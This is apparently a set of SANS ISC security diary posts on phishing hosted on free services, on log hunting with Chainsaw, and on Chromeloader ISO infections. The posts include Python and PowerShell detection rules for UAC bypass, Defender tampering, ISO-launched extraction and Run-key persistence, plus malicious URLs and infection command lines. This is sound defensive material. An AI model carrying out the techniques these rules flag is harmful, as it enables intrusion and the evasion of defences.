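    """Return the detection names a single event triggers (empty list if none)."""
    hits = []
    if event["type"] == "registry_set" and MS_SETTINGS_HANDLER.search(event.get("key", "")):
        hits.append("fodhelper UAC bypass: ms-settings open handler written")
        if event.get("value_name", "").lower() == "delegateexecute":
            hits.append("fodhelper UAC bypass: DelegateExecute value set")
    if event["type"] == "process_create":
        cmd = event.get("command_line", "").lower()
        if "certutil" in event.get("image", "").lower() and "-decode" in cmd:
            hits.append("certutil -decode: embedded payload being unpacked")
        if "set-mppreference" in cmd and "-disablerealtimemonitoring" in cmd:
            hits.append("Defender real-time monitoring disabled")
        if "add-mppreference" in cmd and "-exclusionpath" in cmd:
            hits.append("Defender exclusion path added")
    return hits


def triage(events):
    """Flatten to (event index, detection) pairs, in log order."""
    return [(i, hit) for i, event in enumerate(events) for hit in classify(event)]


if __name__ == "__main__":
    for index, hit in triage(SAMPLE_EVENTS):
        print(index, hit)
```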

[1] https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

22 September 2022

ISC Stormcast For Thursday, September 22nd, 2022 https://isc.sans.edu/podcastdetail.html?id=8184, (Thu, Sep 22nd)

21 September 2022

Phishing Campaigns Use Free Online Resources, (Wed, Sep 21st)

A phishing campaign needs some resources: bandwidth, CPU, storage, … For a very long time, a lot of phishing kits have been hosted on compromised servers. The most popular targets are CMSs that are misconfigured or outdated. I think that WordPress is number one in this category. Be careful, that does not mean WordPress is a bad CMS: most vulnerabilities are introduced through plugins. Once a server is compromised, the phishing kit files are copied onto it and are usually reachable via the /wp-content/ or /wp-plugin/ directories.

I receive a lot of phishing emails daily, via my own platform or submitted by readers, and I see a slight shift away from compromised servers towards free online services. The Internet is full of “*aaS” websites, "Something as a Service" (Forms, Storage, …). Many platforms offer a free subscription to attract customers. Most of the time, these free accounts allow attackers to upload malicious content.

Compromised CMSs have drawbacks:

  1. You need to search and compromise new servers constantly
  2. Those servers IP addresses or domains are quickly indexed in block lists
  3. If a server has been compromised once, it may be compromised again by a competitor
  4. Servers might be limited in resources (bandwidth, CPU, …)
  5. The server might be cleaned by the owner or admin (or not ;-)

By contrast, free services have huge advantages:

  1. They can’t be easily blocked (IP & domains can be added to block lists)
  2. They offer plenty of resources, are reliable
  3. Malicious traffic might remain below the radar for a while

Let's review some examples. If you need to host files (logos, scripts, ...), files.catbox.moe will be helpful:

If you want to host a form and get the data delivered straight to your mailbox, formsubmit.co will be helpful:

Other services look more "technical" but can also be abused by attackers, like ipfs.io:

Here is an example of link found in the wild:

https://ipfs.io/ipfs/bafkreialspsmcfrukiforbhy4onop7yasjotzehubagyuxhw5rpcafsxmm#xavier@<domain>

(The link is gone now)

The web is full of motivated people who offer some resources for free (I remember offering free Linux shells in the 2000s). Be careful: if you offer a free service, there is a good chance that it will be discovered and abused by attackers!

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

21 September 2022

ISC Stormcast For Wednesday, September 21st, 2022 https://isc.sans.edu/podcastdetail.html?id=8182, (Wed, Sep 21st)

20 September 2022

ISC Stormcast For Tuesday, September 20th, 2022 https://isc.sans.edu/podcastdetail.html?id=8180, (Tue, Sep 20th)

20 September 2022

Chainsaw: Hunt, search, and extract event log records, (Mon, Sep 19th)

I first spotted Chainsaw courtesy of Florian Roth’s Twitter feed, given that Chainsaw favors using Sigma as one of its rule engines. Chainsaw is a standalone tool that provides a simple and fast method to triage Windows event logs and identify interesting elements within the logs while applying detection logic (Sigma and Chainsaw) to detect malicious activity. Chainsaw’s powerful ‘first-response’ capability offers a generic and fast method of searching through event logs for keywords (Kornitzer & D, 2022).

The Chainsaw project documentation is robust. As always, read up on the project before use, it makes use of other great projects as well. James and Alex have provided all you need to get started in short order.

I conducted my first experiment using logs from a DFIR consulting gig I had circa 2014 with an impacted manufacturing firm. The victim user and system names have been changed to protect the innocent.
The environment was a very flat Windows environment with a .local domain that was not administered in keeping with best practices. The organization’s controllers were compromised, both the accountant and the domain ;-), leading to a significant financial loss for the organization. As such, I’ve simply changed the user name to CONTROLLER, and the domain to victimsystems.local. The related logs from this event, for purposes of this experiment, were stored in logs/client. In order to change names as described I simply wrote the results to a text file when running Chainsaw as follows:

chainsaw hunt logs/client/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml > results\results.txt

I also ran Chainsaw this way when I discovered that results written to the console are more comprehensive than those written out to CSV with the --csv --output results option. This run exclusively used Sigma rules as noted via -s Sigma.

Figure 1: First Chainsaw experiment

The results were revealing, and in keeping with my original investigation eight years ago. The victim system was thoroughly infested with malware, amongst which I’d identified Trojan.Agent.FSAVXGen, also known as Backdoor:Win32/Simda, a backdoor usually dropped by other malware or downloaded users visiting malicious sites. Chainsaw’s results revealed this malware in the victim system security log with Sigma’s Failed Code Integrity Checks and Remote Service Creation as seen in Figure 2.

Figure 2: Chainsaw reveals Backdoor:Win32/Simda

Note the kernel mode driver, and a service named xina.exe, but the real IOC is the failed code integrity check for l3codeca.acm, a common indicator for this malware.

My second experiment included the use of Florian’s APT Simulator on one of my Windows systems. APTSimulator is exactly what it says it is, delivered as a Windows batch script that uses a set of tools and output files to make a system look as if it was compromised (Roth, 2022).
I chose to run every option, which is complete overkill, but fun nonetheless. I then saved the system’s security event log as APTsim.evtx and ran it through Chainsaw as follows:

chainsaw hunt logs/APTsim.evtx -s sigma/ --mapping mappings/sigma-event-logs-all.yml -r rules/ > results\APTsimResults.txt

Note that this Chainsaw run included -r rules, which incorporates Chainsaw’s built-in rule set as well. From the APTsim.evtx assessment, Chainsaw rules identified Account Tampering (APT Simulator added an admin to the local administrators group), while Sigma rules flagged Generic Password Dumper Activity on LSASS (procdump64.exe), Remote Service Creation (PSEXESVC.EXE), and Rare Schtasks Creations (falshupdate22).

Figure 3: Chainsaw identifies APT Simulator behaviors

This is an extremely useful tool when you need a fast way to hunt in Windows event logs with all the benefits of Sigma and speed. I really enjoyed the opportunity to experiment with Chainsaw, appreciate the project leads for their work, as well as the excellent dependencies Chainsaw takes in Sigma, the EVTX parser, and the TAU Engine. Great stuff all around. In the name of my favorite deathcore band, Whitechapel, “the saw is the law”!

Cheers…until next time.

Russ McRee | @holisticinfosec

References:

Countercept. (2022, August). Rapidly Search and Hunt through Windows Event Logs. GitHub. Retrieved September 15, 2022, from https://github.com/WithSecureLabs/chainsaw

Roth, F. (2022, June 20). NextronSystems/APTSimulator: A toolset to make a system look as if it was the victim of an APT attack. GitHub. Retrieved September 18, 2022, from https://github.com/NextronSystems/APTSimulator

September 19, 2022.

ISC Stormcast For Monday, September 19th, 2022 https://isc.sans.edu/podcastdetail.html?id=8178, (Mon, Sep 19th)

September 19, 2022.

Preventing ISO Malware, (Sun, Sep 18th)

In the last few weeks, I’ve seen a significant uptick in systems infected with Chromeloader malware. This malware is a malicious browser extension that redirects the browser to ad sites and hijacks searches. Given the recent success of this technique, I would not be surprised if others take notice and switch to using it for other things.

Initial infection

The user followed a malicious search result, where the page presented an ISO file named after their search terms. Below are the artifacts from a user who got infected.

https://alizebruisiacult[.]xyz/?cms=Mzg1ODEEDwwMCAYNDQwCAQsCDNDEDgcCDwwPAQAASQ%3D%3D&fn=Stroud%20-%20Advanced%20Engineering%20Mathematics%204e&extt=xpectthatmy.shop%2F%3Ftid%3D952736

C:\Users\user\Downloads\Stroud - Advanced Engineering Mathematics 4e.iso 

This ISO file contained the following files:

files.zip

res.ico

Install.lnk

properties.bat

The user double-clicked the Properties.bat file, which started the infection process:

Parent Process Name: cmd.exe

Parent Process Command Line: cmd.exe /c ""D:\properties.bat" "

Process Name: tar.exe

Process Command Line arguments: tar -xvf "files.zip" -C "C:\Users\user\AppData\Roaming"

They established persistence with a CurrentVersion\Run key:

"opensubtitles-uploader.exe "k2eN"" /f. 

HKEY_CURRENT_USER\S-1-5-21-740110469-27406-3214746-20027\SOFTWARE\Microsoft\Windows\CurrentVersion\

C:\Users\user\AppData\Roaming\opensubtitles-uploader\opensubtitles-uploader.exe.

Connections to malicious domains were made from opensubtitles-uploader.exe:

C:\Users\user\AppData\Roaming\opensubtitles-uploader\opensubtitles-uploader.exe.

https://alizebruisiacult[.]xyz

https://raw.githubusercontent[.]com
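As an added example (my code, not part of the diary), here is a small PowerShell hunt that turns the chain above into two checks: cmd.exe running a .bat from a drive letter other than the system drive (a mounted ISO shows up as a new drive letter) that spawns tar.exe extracting into AppData, and a Run key value pointing at an executable under AppData\Roaming. The records are constructed to mirror the fields the diary lists, using Sysmon Event ID 1 and Event ID 13 property names; the Run value name "opensubtitles" is made up, since the diary does not give it.

```powershell
# Added example, not code from the diary. The records below are constructed; on a real host
# feed Sysmon Event ID 1 (process create) and Event ID 13 (registry value set) objects with
# the same property names into the two Test-* functions.

$SystemDrive = if ($env:SystemDrive) { $env:SystemDrive.TrimEnd(':') } else { 'C' }

# Constructed process-creation records (not real telemetry)
$ProcessEvents = @(
    [pscustomobject]@{   # the chain from the diary: batch on the mounted ISO (D:) -> tar.exe -> AppData
        TimeCreated       = '2022-09-18T10:01:03'
        ParentImage       = 'C:\Windows\System32\cmd.exe'
        ParentCommandLine = 'cmd.exe /c ""D:\properties.bat" "'
        Image             = 'C:\Windows\System32\tar.exe'
        CommandLine       = 'tar -xvf "files.zip" -C "C:\Users\user\AppData\Roaming"'
    },
    [pscustomobject]@{   # benign: an admin unpacking tooling from the system drive
        TimeCreated       = '2022-09-18T10:05:00'
        ParentImage       = 'C:\Windows\System32\cmd.exe'
        ParentCommandLine = 'cmd.exe /c C:\Temp\setup.bat'
        Image             = 'C:\Windows\System32\tar.exe'
        CommandLine       = 'tar -xvf C:\Temp\tools.zip -C C:\ProgramData\tools'
    }
)

# Constructed registry value-set records (Sysmon Event ID 13 shape). The Run value name
# "opensubtitles" is made up; the diary does not give it.
$RegistryEvents = @(
    [pscustomobject]@{
        TimeCreated  = '2022-09-18T10:01:05'
        TargetObject = 'HKU\S-1-5-21-740110469-27406-3214746-20027\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\opensubtitles'
        Details      = '"C:\Users\user\AppData\Roaming\opensubtitles-uploader\opensubtitles-uploader.exe" "k2eN"'
    },
    [pscustomobject]@{   # benign: vendor updater under Program Files
        TimeCreated  = '2022-09-18T09:00:00'
        TargetObject = 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater'
        Details      = '"C:\Program Files\Vendor\updater.exe" /background'
    }
)

function Test-IsoBatchToTar {
    # Flags cmd.exe running a .bat/.cmd that lives on a non-system drive letter and
    # spawns tar.exe with an extraction target under a user's AppData.
    param([Parameter(Mandatory)] $Event)
    $fromBatch = ($Event.ParentImage -match '\\cmd\.exe$') -and
                 ($Event.ParentCommandLine -match '(?i)"?(?<drive>[A-Z]):\\[^"]*\.(bat|cmd)\b')
    if (-not $fromBatch) { return $false }
    $offSystemDrive = $Matches['drive'].ToUpper() -ne $SystemDrive.ToUpper()
    $tarToAppData = ($Event.Image -match '\\tar\.exe$') -and
                    ($Event.CommandLine -match '(?i)-C\s+"?[^"]*\\AppData\\')
    return ($offSystemDrive -and $tarToAppData)
}

function Test-RunKeyToAppData {
    # Flags Run/RunOnce values whose target executable sits under AppData\Roaming.
    param([Parameter(Mandatory)] $Event)
    return ($Event.TargetObject -match '\\CurrentVersion\\Run(Once)?\\') -and
           ($Event.Details -match '(?i)\\AppData\\Roaming\\[^"]*\.exe')
}

Write-Host '== Batch file from a mounted ISO spawning tar.exe into AppData =='
$ProcessEvents | Where-Object { Test-IsoBatchToTar $_ } |
    Format-Table TimeCreated, ParentCommandLine, CommandLine -AutoSize

Write-Host '== Run key persistence pointing into AppData\Roaming =='
$RegistryEvents | Where-Object { Test-RunKeyToAppData $_ } |
    Format-Table TimeCreated, TargetObject, Details -AutoSize
```

With the constructed records, only the first entry of each set is reported. The drive letter check is what keeps the tar.exe rule quiet for ordinary administrative extractions; if your users legitimately run batch files from USB media, tighten it to the AppData target alone or add the extraction source to the condition.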

Since the infection comes from a user mounting an ISO and executing the files inside it, the best way to stop this is to prevent users from mounting an ISO by double-clicking it. Users are still able to burn a CD from within Windows if needed, and power users who need to open ISOs can use compression utilities.

Mubix (Rob Fuller) has a great article about how to disable this (1). Below are two different options to prevent users from double-clicking an ISO file to mount it. The GPO method is a little more complete in its protection; see the article for more details. We have deployed this to end users' desktops in my environment and have had no issues to this point, nor any new infections via this method.

GPO

Computer config -> Admin Templates -> System -> Device Installation Restrictions ->

  • Allow administrators to override Device Installation Restrictions Policies (enabled)
  • Prevent Installation from devices that match any of these device IDs

Add this exact ID:

  • SCSI\CdRomMsft____Virtual_DVD-ROM_

Registry Setting

  • HKEY_CLASSES_ROOT\Windows.IsoFile\shell\mount
  • Value “ProgrammaticAccessOnly” as REG_SZ

(1) https://malicious.link/post/2022/blocking-iso-mounting/
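To make the two settings above auditable, here is an added PowerShell helper (mine, not from the diary or from Mubix's post). It reports whether the ProgrammaticAccessOnly value is present on the mount verb and can add or remove it; the GPO is only read, and the registry location I read it from (HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceInstall\Restrictions, with the blocked IDs under a DenyDeviceIDs subkey and AllowAdminInstall as the override) is my understanding of how that policy is stored, not something the diary states. Run it from an elevated session.

```powershell
# Added example, not code from the diary or from Mubix's post. Audits both controls described
# above and can apply or revert the registry one. Run from an elevated PowerShell session.

$MountKey     = 'Registry::HKEY_CLASSES_ROOT\Windows.IsoFile\shell\mount'
$ValueName    = 'ProgrammaticAccessOnly'
$VirtualDvdId = 'SCSI\CdRomMsft____Virtual_DVD-ROM_'   # the device ID from the diary

function Get-IsoMountVerbStatus {
    # Is the Explorer "Mount" verb for .iso hidden from double-click and the context menu?
    if (-not (Test-Path -LiteralPath $MountKey)) {
        return [pscustomobject]@{ KeyExists = $false; Blocked = $false }
    }
    $blocked = (Get-Item -LiteralPath $MountKey).GetValueNames() -contains $ValueName
    [pscustomobject]@{ KeyExists = $true; Blocked = $blocked }
}

function Set-IsoMountVerbBlocked {
    # Adds the REG_SZ value with empty data. Assumption (mine, not stated in the diary):
    # the shell only checks that the value exists, so the data is irrelevant.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if (-not (Test-Path -LiteralPath $MountKey)) {
        throw "$MountKey not found; the Explorer ISO handler is not registered on this system."
    }
    if ($PSCmdlet.ShouldProcess($MountKey, "Add REG_SZ value '$ValueName'")) {
        New-ItemProperty -LiteralPath $MountKey -Name $ValueName -PropertyType String -Value '' -Force | Out-Null
    }
}

function Remove-IsoMountVerbBlock {
    # Reverts the registry change.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess($MountKey, "Remove value '$ValueName'")) {
        Remove-ItemProperty -LiteralPath $MountKey -Name $ValueName -ErrorAction SilentlyContinue
    }
}

function Get-IsoDeviceRestrictionStatus {
    # Read-only check of the GPO from the diary. Assumption (mine): the policy is backed by
    # HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceInstall\Restrictions, with the blocked IDs
    # stored as string values under its DenyDeviceIDs subkey and the admin override as the
    # AllowAdminInstall DWORD. Confirm with gpresult on a domain-joined machine.
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeviceInstall\Restrictions'
    $ids  = @()
    if (Test-Path -LiteralPath "$base\DenyDeviceIDs") {
        $key = Get-Item -LiteralPath "$base\DenyDeviceIDs"
        $ids = @(foreach ($n in $key.GetValueNames()) { [string]$key.GetValue($n) })
    }
    $override = (Get-ItemProperty -LiteralPath $base -Name AllowAdminInstall -ErrorAction SilentlyContinue).AllowAdminInstall
    [pscustomobject]@{
        VirtualDvdBlocked = ($ids -contains $VirtualDvdId)
        AdminOverride     = ($override -eq 1)
        DeniedIds         = $ids
    }
}

# Usage:
Get-IsoMountVerbStatus
Get-IsoDeviceRestrictionStatus
# Set-IsoMountVerbBlocked -WhatIf    # preview the registry change
# Set-IsoMountVerbBlocked            # apply it
```

The two Get-* functions are safe to run on any host as a compliance check; only Set-IsoMountVerbBlocked and Remove-IsoMountVerbBlock write to the registry, and both honour -WhatIf so the change can be previewed before it is rolled out.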


If you have done this or something similar, let us know.

--

Tom Webb

@twsecblog
